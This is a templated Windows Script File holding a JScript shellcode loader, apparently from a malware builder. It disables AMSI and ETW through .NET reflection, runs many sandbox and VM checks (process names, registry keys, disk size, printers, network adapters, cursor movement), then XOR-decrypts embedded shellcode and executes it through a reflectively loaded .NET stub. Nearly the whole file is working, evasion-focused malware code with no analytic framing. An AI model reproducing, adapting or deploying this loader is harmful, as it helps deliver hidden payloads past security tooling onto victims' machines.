<?xml version="1.0" encoding="utf-8"?>
<package>
<job id="{{ v.job_id }}">
<script language="JScript">
<![CDATA[
function {{ v.fn_build_str }}(a){var s="";for(var i=0;i<a.length;i++)s+=String.fromCharCode(a[i]);return s;}

function {{ v.fn_amsi }}() {
    try {
        var asm  = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
        var amsi = asm.GetType({{ v.fn_build_str }}([{{ v.jsc_auto_amsi_utils }}]));
        if (amsi !== null) {
            amsi.GetField({{ v.fn_build_str }}([{{ v.jsc_amsi_init_fail }}]), (4|32)).SetValue(null, true);
        }
    } catch(e) {}
}

function {{ v.fn_etw }}() {
    try {
        var asm = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
        var t = asm.GetType({{ v.fn_build_str }}([{{ v.jsc_eventing_ep }}]));
        if (t !== null) {
            var fi = t.GetField({{ v.fn_build_str }}([{{ v.jsc_m_enabled }}]), (4|32));
            if (fi !== null) fi.SetValue(null, 0);
        }
    } catch(e) {}
}

function {{ v.fn_sandbox }}() {
    try {
        var wmi = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var pq = wmi.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_proc_q }}]));
        var bad = {{ v.fn_build_str }}([{{ v.jsc_vm_procs }}]).split("|");
        for (var e = new Enumerator(pq); !e.atEnd(); e.moveNext()) {
            var n = e.item().Name.toLowerCase();
            for (var i = 0; i < bad.length; i++) { if (n === bad[i]) return true; }
        }
        var mq = wmi.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_monitor_q }}]));
        for (var e2 = new Enumerator(mq); !e2.atEnd(); e2.moveNext()) {
            var d = e2.item();
            if (d.ScreenWidth && d.ScreenWidth < 800) return true;
        }
    } catch(e2) {}
    // VM registry key checks (XOR-encoded per build)
    try {
        var sh = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
        var _vmr=[{{ jsc_vmware_reg_enc }}],_vmx={{ jsc_vmware_reg_xk }};
        for(var _ri=0;_ri<_vmr.length;_ri++)_vmr[_ri]^=_vmx;
        sh.RegRead({{ v.fn_build_str }}(_vmr));
        return true;
    } catch(e) {}
    try {
        var sh2 = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}]));
        var _vbr=[{{ jsc_vbox_reg_enc }}],_vbx={{ jsc_vbox_reg_xk }};
        for(var _ri2=0;_ri2<_vbr.length;_ri2++)_vbr[_ri2]^=_vbx;
        sh2.RegRead({{ v.fn_build_str }}(_vbr));
        return true;
    } catch(e) {}
    try {
        var fso = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_fs_obj }}]));
        var drv = fso.GetDrive("C:");
        if (drv.TotalSize < 53687091200) return true;
    } catch(e) {}
    try {
        var wmi2 = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var prq = wmi2.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_printer_q }}]));
        var pc = 0;
        for (var ep = new Enumerator(prq); !ep.atEnd(); ep.moveNext()) pc++;
        if (pc === 0) return true;
    } catch(e) {}
    try {
        var wmi3 = GetObject({{ v.fn_build_str }}([{{ v.jsc_winmgmts }}]));
        var naq = wmi3.ExecQuery({{ v.fn_build_str }}([{{ v.jsc_wmi_mac_q }}]));
        var nac = 0;
        for (var ena = new Enumerator(naq); !ena.atEnd(); ena.moveNext()) nac++;
        if (nac < 2) return true;
    } catch(e) {}
    try {
        var _env = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_wscript_shell }}])).Environment("Process");
        if (_env({{ v.fn_build_str }}([{{ v.jsc_env_vbox }}])) !== "") return true;
        if (_env({{ v.fn_build_str }}([{{ v.jsc_env_sandboxie }}])) !== "") return true;
    } catch(e) {}
    return false;
}

var {{ v.var_sc }}  = {% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %};
var {{ v.var_key }} = {% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %}+{% endif %}{% endfor %};

function {{ v.fn_hex2arr }}(h) {
    var a = []; for (var i = 0; i < h.length; i += 2)
        a.push(parseInt(h.substr(i, 2), 16));
    return a;
}

function {{ v.fn_decrypt }}(d, k) {
    var o = []; for (var i = 0; i < d.length; i++)
        o.push(d[i] ^ k[i % k.length]);
    return o;
}

function {{ v.fn_exec }}() {
    if ({{ v.fn_sandbox }}()) { WScript.Quit(0); }
    var _cx = -999, _cy = -999;
    try {
        var _a=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),_w=_a.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
        if(_w){var _t=_w.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
        if(_t){var _pp=_t.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
        if(_pp){var _ps=_pp.GetValue(null,null);if(_ps){_cx=_ps.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue(_ps,null);_cy=_ps.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue(_ps,null);}}}}
    } catch(e) {}
    WScript.Sleep(2000 + Math.floor(Math.random() * 3000));
    if (_cx !== -999) {
        try {
            var _a2=new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}])),_w2=_a2.LoadWithPartialName({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms }}]));
            if(_w2){var _t2=_w2.GetType({{ v.fn_build_str }}([{{ v.jsc_sys_win_forms_cur }}]));
            if(_t2){var _pp2=_t2.GetProperty({{ v.fn_build_str }}([{{ v.jsc_cursor_position }}]),24);
            if(_pp2){var _ps2=_pp2.GetValue(null,null);if(_ps2){var _cx2=_ps2.GetType().GetProperty({{ v.fn_build_str }}([88])).GetValue(_ps2,null);var _cy2=_ps2.GetType().GetProperty({{ v.fn_build_str }}([89])).GetValue(_ps2,null);if(_cx===_cx2&&_cy===_cy2)WScript.Quit(0);}}}}
        } catch(e2) {}
    }
    {{ v.fn_amsi }}();
    {{ v.fn_etw }}();
    var _k = {{ v.fn_hex2arr }}({{ v.var_key }});
    for (var _ki = 0; _ki < _k.length; _ki++) _k[_ki] ^= {{ key_tweak }};
    var sc  = {{ v.fn_decrypt }}({{ v.fn_hex2arr }}({{ v.var_sc }}), _k);
    var loader = new ActiveXObject({{ v.fn_build_str }}([{{ v.jsc_sys_refl_asm }}]));
    var stub   = {{ v.fn_hex2arr }}("{{ dotnet_stub_hex }}");
    var asm    = loader.Load(stub);
    var t      = asm.GetType({{ v.fn_build_str }}([{{ v.jsc_stub_loader }}]));
    var mi     = t.GetMethod({{ v.fn_build_str }}([{{ v.jsc_stub_run }}]));
    mi.Invoke(null, [sc]);
}

{{ v.fn_exec }}();
]]>
</script>
</job>
</package>
